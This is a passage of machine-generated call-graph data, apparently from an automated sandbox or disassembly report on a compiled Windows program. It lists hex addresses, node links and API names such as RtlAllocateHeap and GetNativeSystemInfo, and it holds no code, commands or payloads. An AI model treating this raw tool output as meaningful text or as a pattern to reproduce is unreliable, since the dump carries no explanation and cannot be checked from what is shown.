fd8bbe 12761->13711 12764 fa809c 12762->12764 12765 fa5c10 4 API calls 12764->12765 12767 fa80a3 12765->12767 12766->12401 12768 fa5730 RtlAllocateHeap 12767->12768 12769 fa80b2 12768->12769 12770 fb7a00 RtlAllocateHeap 12769->12770 12771 fa80ed 12770->12771 12772 fa5c10 4 API calls 12771->12772 12773 fa80f4 12772->12773 12774 fb7a00 RtlAllocateHeap 12773->12774 12775 fa810c 12774->12775 12776 fa5c10 4 API calls 12775->12776 12777 fa8113 12776->12777 12778 fb7a00 RtlAllocateHeap 12777->12778 12779 fa8144 12778->12779 12780 fa5c10 4 API calls 12779->12780 12781 fa814b 12780->12781 12782 fa5730 RtlAllocateHeap 12781->12782 12783 fa815a 12782->12783 12784 fb7a00 RtlAllocateHeap 12783->12784 12785 fa8195 12784->12785 12786 fa5c10 4 API calls 12785->12786 12787 fa819c 12786->12787 12788 fb7a00 RtlAllocateHeap 12787->12788 12789 fa81b4 12788->12789 12790 fa5c10 4 API calls 12789->12790 12791 fa81bb 12790->12791 12792 fb7a00 RtlAllocateHeap 12791->12792 12793 fa81ec 12792->12793 12794 fa5c10 4 API calls 12793->12794 12795 fa81f3 12794->12795 12796 fa5730 RtlAllocateHeap 12795->12796 12797 fa8202 12796->12797 12798 fb7a00 RtlAllocateHeap 12797->12798 12799 fa823d 12798->12799 12800 fa5c10 4 API calls 12799->12800 12801 fa8244 12800->12801 12802 fb7a00 RtlAllocateHeap 12801->12802 12803 fa825c 12802->12803 12804 fa5c10 4 API calls 12803->12804 12805 fa8263 12804->12805 12806 fb7a00 RtlAllocateHeap 12805->12806 12807 fa8294 12806->12807 12808 fa5c10 4 API calls 12807->12808 12809 fa829b 12808->12809 12810 fa5730 RtlAllocateHeap 12809->12810 12810->12766 12812 fa45d4 12811->12812 12813 fa4647 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12812->12813 12814 fb80c0 RtlAllocateHeap 12812->12814 12813->12406 12814->12813 12816 fa83e5 __cftof 12815->12816 12817 fb7a00 RtlAllocateHeap 12816->12817 12826 fa8403 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12816->12826 12818 fa841c 12817->12818 12819 fa5c10 4 API calls 12818->12819 12820 fa8427 12819->12820 12821 fb7a00 RtlAllocateHeap 12820->12821 12822 fa8449 12821->12822 12823 fa5c10 4 API calls 12822->12823 12824 fa8454 shared_ptr 12823->12824 12825 fa8524 GetNativeSystemInfo 12824->12825 12824->12826 12825->12826 12826->12410 12830 fb7e01 12827->12830 12831 fb7e2c 12827->12831 12828 fb7f20 12829 fb9270 RtlAllocateHeap 12828->12829 12839 fb7e91 shared_ptr 12829->12839 12830->12474 12831->12828 12832 fb7f1b 12831->12832 12833 fb7e80 12831->12833 12834 fb7ea7 12831->12834 12835 fa2480 RtlAllocateHeap 12832->12835 12833->12832 12836 fb7e8b 12833->12836 12838 fbd3e2 RtlAllocateHeap 12834->12838 12834->12839 12835->12828 12837 fbd3e2 RtlAllocateHeap 12836->12837 12837->12839 12838->12839 12839->12474 12841 fb777b 12840->12841 12851 fb7864 shared_ptr 12840->12851 12844 fb77ea 12841->12844 12845 fb7811 12841->12845 12850 fb77fb 12841->12850 12841->12851 12842 fb9270 RtlAllocateHeap 12843 fb78f6 12842->12843 12846 fa2480 RtlAllocateHeap 12843->12846 12844->12843 12848 fbd3e2 RtlAllocateHeap 12844->12848 12849 fbd3e2 RtlAllocateHeap 12845->12849 12845->12850 12847 fb78fb 12846->12847 12848->12850 12849->12850 12850->12842 12850->12851 12851->12477 12853 fb7a00 RtlAllocateHeap 12852->12853 12854 fa991e 12853->12854 12855 fa5c10 4 API calls 12854->12855 12856 fa9927 shared_ptr __cftof __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12855->12856 12856->12495 12858 fd8ad1 12857->12858 12859 fd8868 3 API calls 12858->12859 12860 fd8adb 12859->12860 12860->12499 12862 fbc1d9 RtlAllocateHeap 12861->12862 12863 fb820a 12862->12863 12863->12492 13720 fbc15d 12864->13720 12866 fbc1ea std::_Xinvalid_argument 12866->12462 12868 fb8dc9 12867->12868 12869 fb8cc3 12867->12869 12870 fb9270 RtlAllocateHeap 12868->12870 12872 fb8d2f 12869->12872 12873 fb8d05 12869->12873 12871 fb8dce 12870->12871 12874 fa2480 RtlAllocateHeap 12871->12874 12877 fbd3e2 RtlAllocateHeap 12872->12877 12878 fb8d16 shared_ptr 12872->12878 12873->12871 12875 fb8d10 12873->12875 12874->12878 12876 fbd3e2 RtlAllocateHeap 12875->12876 12876->12878 12877->12878 12878->12477 12880 fb8339 12879->12880 12881 fb834d 12880->12881 12882 fb8f40 RtlAllocateHeap 12880->12882 12881->12574 12882->12881 12884 fb8248 12883->12884 12885 fb8292 12883->12885 12884->12885 12886 fb8251 12884->12886 12888 fb82a1 12885->12888 12890 fb8f40 RtlAllocateHeap 12885->12890 12887 fb9280 RtlAllocateHeap 12886->12887 12889 fb825a 12887->12889 12888->12576 12889->12576 12890->12888 12892 fb80c0 RtlAllocateHeap 12891->12892 12893 fa49f3 12892->12893 12894 fb80c0 RtlAllocateHeap 12893->12894 12895 fa4a0c 12894->12895 13723 fa4690 12895->13723 12897 fa4a99 shared_ptr 12897->12631 12924 fb7f80 12898->12924 12900 fa596b 12901 fa59e0 12900->12901 12902 fb7f80 RtlAllocateHeap 12901->12902 12913 fa5a45 12902->12913 12903 fb7a00 RtlAllocateHeap 12903->12913 12904 fa5c09 12906 fb8200 RtlAllocateHeap 12904->12906 12905 fa5bdd __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12905->12646 12908 fa5c0e 12906->12908 12907 fb80c0 RtlAllocateHeap 12907->12913 12909 fa5940 RtlAllocateHeap 12908->12909 12911 fa5c54 12909->12911 12912 fa59e0 4 API calls 12911->12912 12914 fa5c6a 12912->12914 12913->12903 12913->12904 12913->12905 12913->12907 12937 fa5730 12913->12937 12915 fa4b30 4 API calls 12914->12915 12916 fa5c7b shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12915->12916 12916->12646 12918 fa4dc2 12917->12918 12922 fa4b92 12917->12922 12918->12648 12920 fa4ce5 12920->12918 12921 fb8ca0 RtlAllocateHeap 12920->12921 12921->12920 12922->12920 12923 fb8ca0 RtlAllocateHeap 12922->12923 12943 fd6da6 12922->12943 12923->12922 12926 fb7f9e __cftof 12924->12926 12928 fb7fc7 12924->12928 12925 fb9270 RtlAllocateHeap 12927 fb80b8 12925->12927 12926->12900 12929 fa2480 RtlAllocateHeap 12927->12929 12930 fb801b 12928->12930 12931 fb803e 12928->12931 12935 fb802c __cftof 12928->12935 12932 fb80bd 12929->12932 12930->12927 12934 fbd3e2 RtlAllocateHeap 12930->12934 12933 fbd3e2 RtlAllocateHeap 12931->12933 12931->12935 12933->12935 12934->12935 12935->12925 12936 fb8095 shared_ptr 12935->12936 12936->12900 12941 fa5860 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12937->12941 12942 fa5799 shared_ptr 12937->12942 12938 fa592a 12940 fb8200 RtlAllocateHeap 12938->12940 12939 fb80c0 RtlAllocateHeap 12939->12942 12940->12941 12941->12913 12942->12938 12942->12939 12942->12941 12944 fd6db4 12943->12944 12945 fd6dc2 __fassign 12943->12945 12948 fd6d19 12944->12948 12945->12922 12949 fd690a __fassign 3 API calls 12948->12949 12950 fd6d2c 12949->12950 12953 fd6d52 12950->12953 12952 fd6d3d 12952->12922 12954 fd6d8f 12953->12954 12956 fd6d5f 12953->12956 12964 fdb67d 12954->12964 12958 fd6d6e __fassign 12956->12958 12959 fdb6a1 12956->12959 12958->12952 12960 fd690a __fassign 3 API calls 12959->12960 12961 fdb6be 12960->12961 12963 fdb6ce __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12961->12963 12968 fdf1bf 12961->12968 12963->12958 12965 fdb688 12964->12965 12966 fdb5fb __fassign 2 API calls 12965->12966 12967 fdb698 12966->12967 12967->12958 12969 fd690a __fassign 3 API calls 12968->12969 12970 fdf1df __fassign 12969->12970 12971 fdb04b __fassign RtlAllocateHeap 12970->12971 12972 fdf232 __cftof __fassign __freea __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12970->12972 12971->12972 12972->12963 12974 fb9294 12973->12974 12977 fb92a5 12974->12977 13091 fb94e0 12974->13091 12976 fb932b 12976->12698 12977->12698 12979 fb367f 12978->12979 12983 fb3e6f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 12978->12983 12980 fb80c0 RtlAllocateHeap 12979->12980 12981 fb36b0 12980->12981 12982 fb4327 12981->12982 12984 fb80c0 RtlAllocateHeap 12981->12984 12985 fb8200 RtlAllocateHeap 12982->12985 12983->12698 12986 fb36ff 12984->12986 12987 fb432c 12985->12987 12986->12982 12989 fb80c0 RtlAllocateHeap 12986->12989 12988 fb8200 RtlAllocateHeap 12987->12988 12992 fb4331 12988->12992 12990 fb3743 12989->12990 12990->12982 12991 fb3765 12990->12991 12993 fb80c0 RtlAllocateHeap 12991->12993 12995 fb8200 RtlAllocateHeap 12992->12995 12994 fb3785 12993->12994 12996 fb7a00 RtlAllocateHeap 12994->12996 12999 fb4340 12995->12999 12997 fb3798 12996->12997 12998 fa5c10 4 API calls 12997->12998 13000 fb37a3 12998->13000 13397 fbc199 12999->13397 13000->12987 13002 fb37ef 13000->13002 13003 fb80c0 RtlAllocateHeap 13002->13003 13006 fb3811 shared_ptr 13003->13006 13004 fbc1d9 RtlAllocateHeap 13004->12983 13005 fa98f0 4 API calls 13007 fb3872 13005->13007 13006->12992 13006->13005 13008 fb7a00 RtlAllocateHeap 13007->13008 13013 fb3c79 shared_ptr 13007->13013 13009 fb3889 13008->13009 13010 fa5c10 4 API calls 13009->13010 13011 fb3894 13010->13011 13012 fb80c0 RtlAllocateHeap 13011->13012 13014 fb38dc shared_ptr 13012->13014 13013->12983 13013->13004 13014->12992 13015 fb39bd 13014->13015 13065 fb3ab7 shared_ptr __dosmaperr 13014->13065 13016 fb80c0 RtlAllocateHeap 13015->13016 13017 fb39da 13016->13017 13259 faad70 13017->13259 13018 fd8ab6 3 API calls 13020 fb3b7a 13018->13020 13020->12999 13021 fb3b89 13020->13021 13021->13013 13022 fb3c8d 13021->13022 13023 fb3ba2 13021->13023 13024 fb3f42 13021->13024 13025 fb3e74 13021->13025 13030 fb80c0 RtlAllocateHeap 13022->13030 13027 fb80c0 RtlAllocateHeap 13023->13027 13031 fb7a00 RtlAllocateHeap 13024->13031 13028 fb80c0 RtlAllocateHeap 13025->13028 13026 fb7a00 RtlAllocateHeap 13029 fb3a96 13026->13029 13033 fb3bca 13027->13033 13034 fb3e9c 13028->13034 13035 fb7a00 RtlAllocateHeap 13029->13035 13036 fb3cb5 13030->13036 13037 fb3f56 13031->13037 13032 fb39e5 shared_ptr 13032->12999 13032->13026 13038 fb7a00 RtlAllocateHeap 13033->13038 13039 fb7a00 RtlAllocateHeap 13034->13039 13040 fb3aa8 13035->13040 13041 fb7a00 RtlAllocateHeap 13036->13041 13042 fb7a00 RtlAllocateHeap 13037->13042 13043 fb3be8 13038->13043 13044 fb3eba 13039->13044 13045 fa49a0 RtlAllocateHeap 13040->13045 13046 fb3cd3 13041->13046 13047 fb3f6e 13042->13047 13048 fa5c10 4 API calls 13043->13048 13049 fa5c10 4 API calls 13044->13049 13045->13065 13050 fa5c10 4 API calls 13046->13050 13051 fb7a00 RtlAllocateHeap 13047->13051 13052 fb3bef 13048->13052 13053 fb3ec1 13049->13053 13054 fb3cda 13050->13054 13055 fb3f86 13051->13055 13058 fb7a00 RtlAllocateHeap 13052->13058 13059 fb7a00 RtlAllocateHeap 13053->13059 13056 fb7a00 RtlAllocateHeap 13054->13056 13057 fb7a00 RtlAllocateHeap 13055->13057 13061 fb3cef 13056->13061 13062 fb3f98 13057->13062 13063 fb3c07 13058->13063 13060 fb3ed9 13059->13060 13064 fb7a00 RtlAllocateHeap 13060->13064 13066 fb7a00 RtlAllocateHeap 13061->13066 13270 fb2f10 13062->13270 13068 fb7a00 RtlAllocateHeap 13063->13068 13069 fb3ef1 13064->13069 13065->12999 13065->13018 13070 fb3d07 13066->13070 13071 fb3c1f 13068->13071 13072 fb7a00 RtlAllocateHeap 13069->13072 13073 fb7a00 RtlAllocateHeap 13070->13073 13074 fb7a00 RtlAllocateHeap 13071->13074 13075 fb3f09 13072->13075 13076 fb3d1f 13073->13076 13077 fb3c37 13074->13077 13079 fb7a00 RtlAllocateHeap 13075->13079 13080 fb7a00 RtlAllocateHeap 13076->13080 13078 fb7a00 RtlAllocateHeap 13077->13078 13081 fb3c4f 13078->13081 13082 fb3f21 13079->13082 13083 fb3d37 13080->13083 13084 fb7a00 RtlAllocateHeap 13081->13084 13085 fb7a00 RtlAllocateHeap 13082->13085 13086 fb7a00 RtlAllocateHeap 13083->13086 13087 fb3c67 13084->13087 13085->13087 13088 fb3d49 13086->13088 13090 fb7a00 RtlAllocateHeap 13087->13090 13103 fb1ec0 13088->13103 13090->13013 13092 fb950b 13091->13092 13093 fb9619 13091->13093 13097 fb9579 13092->13097 13098 fb9552 13092->13098 13094 fb9270 RtlAllocateHeap 13093->13094 13095 fb961e 13094->13095 13096 fa2480 RtlAllocateHeap 13095->13096 13102 fb9563 shared_ptr 13096->13102 13100 fbd3e2 RtlAllocateHeap 13097->13100 13097->13102 13098->13095 13099 fb955d 13098->13099 13101 fbd3e2 RtlAllocateHeap 13099->13101 13100->13102 13101->13102 13102->12976 13104 fb80c0 RtlAllocateHeap 13103->13104 13105 fb1f5b 13104->13105 13106 fb1fd8 13105->13106 13107 fb1f68 13105->13107 13109 fb80c0 RtlAllocateHeap 13106->13109 13108 fb7a00 RtlAllocateHeap 13107->13108 13110 fb1f82 13108->13110 13115 fb2017 shared_ptr 13109->13115 13111 fa5c10 4 API calls 13110->13111 13112 fb1f89 13111->13112 13113 fb7a00 RtlAllocateHeap 13112->13113 13114 fb1f9f 13113->13114 13118 fb7a00 RtlAllocateHeap 13114->13118 13116 fb2131 13115->13116 13119 fb20af 13115->13119 13120 fb2ec5 13115->13120 13146 fb2a26 shared_ptr 13115->13146 13117 fb7a00 RtlAllocateHeap 13116->13117 13121 fb2140 13117->13121 13122 fb1fb7 13118->13122 13123 fb80c0 RtlAllocateHeap 13119->13123 13124 fb8200 RtlAllocateHeap 13120->13124 13125 fa5c10 4 API calls 13121->13125 13126 fb7a00 RtlAllocateHeap 13122->13126 13133 fb20d3 shared_ptr 13123->13133 13127 fb2eca 13124->13127 13135 fb214b 13125->13135 13235 fb1fcf 13126->13235 13128 fb8200 RtlAllocateHeap 13127->13128 13137 fb2ecf 13128->13137 13129 fbc199 std::_Xinvalid_argument RtlAllocateHeap 13130 fb2ef2 13129->13130 13134 fbc1d9 RtlAllocateHeap 13130->13134 13131 fb80c0 RtlAllocateHeap 13131->13116 13132 fb7a00 RtlAllocateHeap 13136 fb2bec 13132->13136 13133->13131 13133->13146 13135->13127 13138 fb21a2 13135->13138 13139 fae530 10 API calls 13136->13139 13141 fbc199 std::_Xinvalid_argument RtlAllocateHeap 13137->13141 13140 fb80c0 RtlAllocateHeap 13138->13140 13139->13146 13144 fb21c7 shared_ptr 13140->13144 13141->13146 13142 fb7a00 RtlAllocateHeap 13143 fb2232 13142->13143 13145 fa5c10 4 API calls 13143->13145 13144->13137 13144->13142 13147 fb223d 13145->13147 13146->13129 13149 fb2ea0 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13146->13149 13148 fb80c0 RtlAllocateHeap 13147->13148 13150 fb22a4 shared_ptr __dosmaperr 13148->13150 13149->13013 13150->13137 13151 fd8ab6 3 API calls 13150->13151 13152 fb2355 13151->13152 13152->13137 13153 fb2364 13152->13153 13153->13130 13155 fb265b 13153->13155 13156 fb24aa 13153->13156 13157 fb237d 13153->13157 13158 fb25a7 13153->13158 13199 fb23d2 shared_ptr 13153->13199 13154 fb7a00 RtlAllocateHeap 13163 fb2730 13154->13163 13161 fb7a00 RtlAllocateHeap 13155->13161 13160 fb7a00 RtlAllocateHeap 13156->13160 13159 fb7a00 RtlAllocateHeap 13157->13159 13162 fb7a00 RtlAllocateHeap 13158->13162 13164 fb2394 13159->13164 13165 fb24c1 13160->13165 13166 fb2672 13161->13166 13167 fb25be 13162->13167 13168 fb7a00 RtlAllocateHeap 13163->13168 13169 fb7a00 RtlAllocateHeap 13164->13169 13170 fb7a00 RtlAllocateHeap 13165->13170 13171 fb7a00 RtlAllocateHeap 13166->13171 13172 fb7a00 RtlAllocateHeap 13167->13172 13181 fb2742 13168->13181 13173 fb23ac 13169->13173 13174 fb24d9 13170->13174 13175 fb268a 13171->13175 13176 fb25d6 13172->13176 13177 fb7a00 RtlAllocateHeap 13173->13177 13178 fb7a00 RtlAllocateHeap 13174->13178 13179 fb7a00 RtlAllocateHeap 13175->13179 13180 fb7a00 RtlAllocateHeap 13176->13180 13182 fb23c4 13177->13182 13193 fb24f1 13178->13193 13183 fb26a2 13179->13183 13184 fb25ee 13180->13184 13188 fb2b73 13181->13188 13400 fd67b7 13181->13400 13581 fa8d30 13182->13581 13601 fa8eb0 13183->13601 13591 fa9030 13184->13591 13190 fb7a00 RtlAllocateHeap 13188->13190 13191 fb2b8d 13190->13191 13195 fa5c10 4 API calls 13191->13195 13192 fb277b 13196 fb7a00 RtlAllocateHeap 13192->13196 13194 fb80c0 RtlAllocateHeap 13193->13194 13194->13199 13197 fb2b94 13195->13197 13203 fb2790 shared_ptr __dosmaperr 13196->13203 13198 fb7a00 RtlAllocateHeap 13197->13198 13200 fb2baa 13198->13200 13199->13146 13199->13154 13201 fb7a00 RtlAllocateHeap 13200->13201 13202 fb2bc2 13201->13202 13204 fb7a00 RtlAllocateHeap 13202->13204 13203->13146 13205 fd8ab6 3 API calls 13203->13205 13204->13235 13206 fb2849 13205->13206 13206->13130 13206->13146 13206->13188 13207 fb2871 13206->13207 13208 fb7a00 RtlAllocateHeap 13207->13208 13209 fb2888 13208->13209 13210 fb7a00 RtlAllocateHeap 13209->13210 13211 fb289d 13210->13211 13404 fa77b0 13211->13404 13213 fb28a6 13214 fb28c1 13213->13214 13215 fb2b16 13213->13215 13217 fb7a00 RtlAllocateHeap 13214->13217 13216 fb7a00 RtlAllocateHeap 13215->13216 13218 fb2b20 13216->13218 13219 fb28cb 13217->13219 13220 fa5c10 4 API calls 13218->13220 13221 fa5c10 4 API calls 13219->13221 13223 fb2b27 13220->13223 13222 fb28d2 13221->13222 13224 fb7a00 RtlAllocateHeap 13222->13224 13225 fb7a00 RtlAllocateHeap 13223->13225 13226 fb28e8 13224->13226 13227 fb2b3d 13225->13227 13228 fb7a00 RtlAllocateHeap 13226->13228 13229 fb7a00 RtlAllocateHeap 13227->13229 13230 fb2900 13228->13230 13231 fb2b55 13229->13231 13232 fb7a00 RtlAllocateHeap 13230->13232 13233 fb7a00 RtlAllocateHeap 13231->13233 13234 fb2918 13232->13234 13233->13235 13236 fb7a00 RtlAllocateHeap 13234->13236 13235->13132 13237 fb292a 13236->13237 13417 fae530 13237->13417 13239 fb2933 13239->13146 13240 fb7a00 RtlAllocateHeap 13239->13240 13241 fb2994 13240->13241 13242 fa5c10 4 API calls 13241->13242 13243 fb299f 13242->13243 13244 fb8320 RtlAllocateHeap 13243->13244 13245 fb29b3 13244->13245 13551 fb85e0 13245->13551 13247 fb29c7 13248 fb8320 RtlAllocateHeap 13247->13248 13249 fb29d7 13248->13249 13250 fb7a00 RtlAllocateHeap 13249->13250 13251 fb29f7 13250->13251 13555 fa8980 13251->13555 13253 fb29fe 13254 fb7a00 RtlAllocateHeap 13253->13254 13255 fb2a13 13254->13255 13256 fa5c10 4 API calls 13255->13256 13257 fb2a1a 13256->13257 13563 fa5ee0 13257->13563 13261 faaec0 13259->13261 13260 faaee6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13260->13032 13261->13260 13262 fa45b0 RtlAllocateHeap 13261->13262 13263 faafab __cftof 13262->13263 13681 fa55f0 13263->13681 13265 fab04e 13266 fb80c0 RtlAllocateHeap 13265->13266 13267 fab08b 13266->13267 13268 fb8200 RtlAllocateHeap 13267->13268 13269 fab18c 13268->13269 13271 fb2f54 13270->13271 13272 fb7a00 RtlAllocateHeap 13271->13272 13273 fb2f68 13272->13273 13274 fa5c10 4 API calls 13273->13274 13275 fb2f6f 13274->13275 13276 fb7a00 RtlAllocateHeap 13275->13276 13277 fb2f82 13276->13277 13278 fb7a00 RtlAllocateHeap 13277->13278 13279 fb2f97 13278->13279 13280 fb7a00 RtlAllocateHeap 13279->13280 13281 fb2fac 13280->13281 13282 fb7a00 RtlAllocateHeap 13281->13282 13283 fb350a 13282->13283 13284 fae530 10 API calls 13283->13284 13285 fb3513 shared_ptr 13284->13285 13286 fb80c0 RtlAllocateHeap 13285->13286 13289 fb360a shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13285->13289 13287 fb36b0 13286->13287 13288 fb4327 13287->13288 13290 fb80c0 RtlAllocateHeap 13287->13290 13291 fb8200 RtlAllocateHeap 13288->13291 13289->13013 13292 fb36ff 13290->13292 13293 fb432c 13291->13293 13292->13288 13295 fb80c0 RtlAllocateHeap 13292->13295 13294 fb8200 RtlAllocateHeap 13293->13294 13298 fb4331 13294->13298 13296 fb3743 13295->13296 13296->13288 13297 fb3765 13296->13297 13299 fb80c0 RtlAllocateHeap 13297->13299 13301 fb8200 RtlAllocateHeap 13298->13301 13300 fb3785 13299->13300 13302 fb7a00 RtlAllocateHeap 13300->13302 13305 fb4340 13301->13305 13303 fb3798 13302->13303 13304 fa5c10 4 API calls 13303->13304 13306 fb37a3 13304->13306 13307 fbc199 std::_Xinvalid_argument RtlAllocateHeap 13305->13307 13306->13293 13308 fb37ef 13306->13308 13319 fb3c79 shared_ptr 13307->13319 13309 fb80c0 RtlAllocateHeap 13308->13309 13312 fb3811 shared_ptr 13309->13312 13310 fbc1d9 RtlAllocateHeap 13310->13289 13311 fa98f0 4 API calls 13313 fb3872 13311->13313 13312->13298 13312->13311 13314 fb7a00 RtlAllocateHeap 13313->13314 13313->13319 13315 fb3889 13314->13315 13316 fa5c10 4 API calls 13315->13316 13317 fb3894 13316->13317 13318 fb80c0 RtlAllocateHeap 13317->13318 13320 fb38dc shared_ptr 13318->13320 13319->13289 13319->13310 13320->13298 13321 fb39bd 13320->13321 13371 fb3ab7 shared_ptr __dosmaperr 13320->13371 13322 fb80c0 RtlAllocateHeap 13321->13322 13323 fb39da 13322->13323 13325 faad70 4 API calls 13323->13325 13324 fd8ab6 3 API calls 13326 fb3b7a 13324->13326 13338 fb39e5 shared_ptr 13325->13338 13326->13305 13327 fb3b89 13326->13327 13327->13319 13328 fb3c8d 13327->13328 13329 fb3ba2 13327->13329 13330 fb3f42 13327->13330 13331 fb3e74 13327->13331 13336 fb80c0 RtlAllocateHeap 13328->13336 13333 fb80c0 RtlAllocateHeap 13329->13333 13337 fb7a00 RtlAllocateHeap 13330->13337 13334 fb80c0 RtlAllocateHeap 13331->13334 13332 fb7a00 RtlAllocateHeap 13335 fb3a96 13332->13335 13339 fb3bca 13333->13339 13340 fb3e9c 13334->13340 13341 fb7a00 RtlAllocateHeap 13335->13341 13342 fb3cb5 13336->13342 13343 fb3f56 13337->13343 13338->13305 13338->13332 13344 fb7a00 RtlAllocateHeap 13339->13344 13345 fb7a00 RtlAllocateHeap 13340->13345 13346 fb3aa8 13341->13346 13347 fb7a00 RtlAllocateHeap 13342->13347 13348 fb7a00 RtlAllocateHeap 13343->13348 13349 fb3be8 13344->13349 13350 fb3eba 13345->13350 13351 fa49a0 RtlAllocateHeap 13346->13351 13352 fb3cd3 13347->13352 13353 fb3f6e 13348->13353 13354 fa5c10 4 API calls 13349->13354 13355 fa5c10 4 API calls 13350->13355 13351->13371 13356 fa5c10 4 API calls 13352->13356 13357 fb7a00 RtlAllocateHeap 13353->13357 13358 fb3bef 13354->13358 13359 fb3ec1 13355->13359 13360 fb3cda 13356->13360 13361 fb3f86 13357->13361 13364 fb7a00 RtlAllocateHeap 13358->13364 13365 fb7a00 RtlAllocateHeap 13359->13365 13362 fb7a00 RtlAllocateHeap 13360->13362 13363 fb7a00 RtlAllocateHeap 13361->13363 13367 fb3cef 13362->13367 13368 fb3f98 13363->13368 13369 fb3c07 13364->13369 13366 fb3ed9 13365->13366 13370 fb7a00 RtlAllocateHeap 13366->13370 13372 fb7a00 RtlAllocateHeap 13367->13372 13373 fb2f10 12 API calls 13368->13373 13374 fb7a00 RtlAllocateHeap 13369->13374 13375 fb3ef1 13370->13375 13371->13305 13371->13324 13376 fb3d07 13372->13376 13373->13319 13377 fb3c1f 13374->13377 13378 fb7a00 RtlAllocateHeap 13375->13378 13379 fb7a00 RtlAllocateHeap 13376->13379 13380 fb7a00 RtlAllocateHeap 13377->13380 13381 fb3f09 13378->13381 13382 fb3d1f 13379->13382 13383 fb3c37 13380->13383 13385 fb7a00 RtlAllocateHeap 13381->13385 13386 fb7a00 RtlAllocateHeap 13382->13386 13384 fb7a00 RtlAllocateHeap 13383->13384 13387 fb3c4f 13384->13387 13388 fb3f21 13385->13388 13389 fb3d37 13386->13389 13390 fb7a00 RtlAllocateHeap 13387->13390 13391 fb7a00 RtlAllocateHeap 13388->13391 13392 fb7a00 RtlAllocateHeap 13389->13392 13393 fb3c67 13390->13393 13391->13393 13394 fb3d49 13392->13394 13396 fb7a00 RtlAllocateHeap 13393->13396 13395 fb1ec0 12 API calls 13394->13395 13395->13319 13396->13319 13708 fbc0e9 13397->13708 13399 fbc1aa std::_Xinvalid_argument 13401 fd67c3 __fassign 13400->13401 13403 fd67cd __dosmaperr ___std_exception_copy 13401->13403 13611 fd6740 13401->13611 13403->13192 13634 fb8680 13404->13634 13406 fa77f1 13407 fb8320 RtlAllocateHeap 13406->13407 13409 fa7803 shared_ptr 13407->13409 13408 fb7a00 RtlAllocateHeap 13410 fa7861 13408->13410 13409->13408 13416 fa78a6 shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13409->13416 13411 fb7a00 RtlAllocateHeap 13410->13411 13412 fa787c 13411->13412 13413 fa5c10 4 API calls 13412->13413 13414 fa7883 13413->13414 13415 fb80c0 RtlAllocateHeap 13414->13415 13415->13416 13416->13213 13418 fb7a00 RtlAllocateHeap 13417->13418 13419 fae576 13418->13419 13420 fa5c10 4 API calls 13419->13420 13421 fae581 13420->13421 13422 fb7a00 RtlAllocateHeap 13421->13422 13423 fae59c 13422->13423 13424 fa5c10 4 API calls 13423->13424 13425 fae5a7 13424->13425 13426 fb9280 RtlAllocateHeap 13425->13426 13427 fae5ba 13426->13427 13428 fb8320 RtlAllocateHeap 13427->13428 13429 fae5fc 13428->13429 13430 fb8220 RtlAllocateHeap 13429->13430 13431 fae60d 13430->13431 13432 fb8320 RtlAllocateHeap 13431->13432 13433 fae61e 13432->13433 13434 fb7a00 RtlAllocateHeap 13433->13434 13435 fae7cb 13434->13435 13436 fb7a00 RtlAllocateHeap 13435->13436 13437 fae7e0 13436->13437 13438 fb7a00 RtlAllocateHeap 13437->13438 13439 fae7f2 13438->13439 13440 fabe30 10 API calls 13439->13440 13441 fae7fe 13440->13441 13442 fb7a00 RtlAllocateHeap 13441->13442 13443 fae813 13442->13443 13444 fb7a00 RtlAllocateHeap 13443->13444 13445 fae82b 13444->13445 13446 fa5c10 4 API calls 13445->13446 13447 fae832 13446->13447 13448 fa8580 RtlAllocateHeap 13447->13448 13450 fae83e 13448->13450 13449 faea8f shared_ptr __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 13449->13239 13450->13449 13451 fb7a00 RtlAllocateHeap 13450->13451 13452 faeb19 13451->13452 13453 fa5c10 4 API calls 13452->13453 13454 faeb21 13453->13454 13643 fb83c0 13454->13643 13456 faeb36 13457 fb8220 RtlAllocateHeap 13456->13457 13458 faeb45 13457->13458 13459 fb7a00 RtlAllocateHeap 13458->13459 13460 faed60 13459->13460 13461 fa5c10 4 API calls 13460->13461 13462 faed68 13461->13462 13463 fb83c0 RtlAllocateHeap 13462->13463 13464 faed7d 13463->13464 13465 fb8220 RtlAllocateHeap 13464->13465 13468 faed8c 13465->13468 13466 faf699 shared_ptr 13466->13239 13467 fb80c0 RtlAllocateHeap 13467->13468 13468->13466 13468->13467 13469 faf6cb 13468->13469 13470 fb7a00 RtlAllocateHeap 13469->13470 13471 faf727 13470->13471 13472 fa5c10 4 API calls 13471->13472 13473 faf72e 13472->13473 13474 fb7a00 RtlAllocateHeap 13473->13474 13475 faf741 13474->13475 13476 fb7a00 RtlAllocateHeap 13475->13476 13477 faf756 13476->13477 13478 fb7a00 RtlAllocateHeap 13477->13478 13479 faf76b 13478->13479 13480 fb7a00 RtlAllocateHeap 13479->13480 13481 faf77d 13480->13481 13482 fae530 10 API calls 13481->13482 13483 faf786 13482->13483 13484 fb80c0 RtlAllocateHeap 13483->13484 13485 faf7aa 13484->13485 13486 fb7a00 RtlAllocateHeap 13485->13486 13487 faf7ba 13486->13487 13488 fb80c0 RtlAllocateHeap 13487->13488 13489 faf7d7 13488->13489 13490 fb80c0 RtlAllocateHeap 13489->13490 13492 faf7f0 13490->13492 13491 faf982 shared_ptr 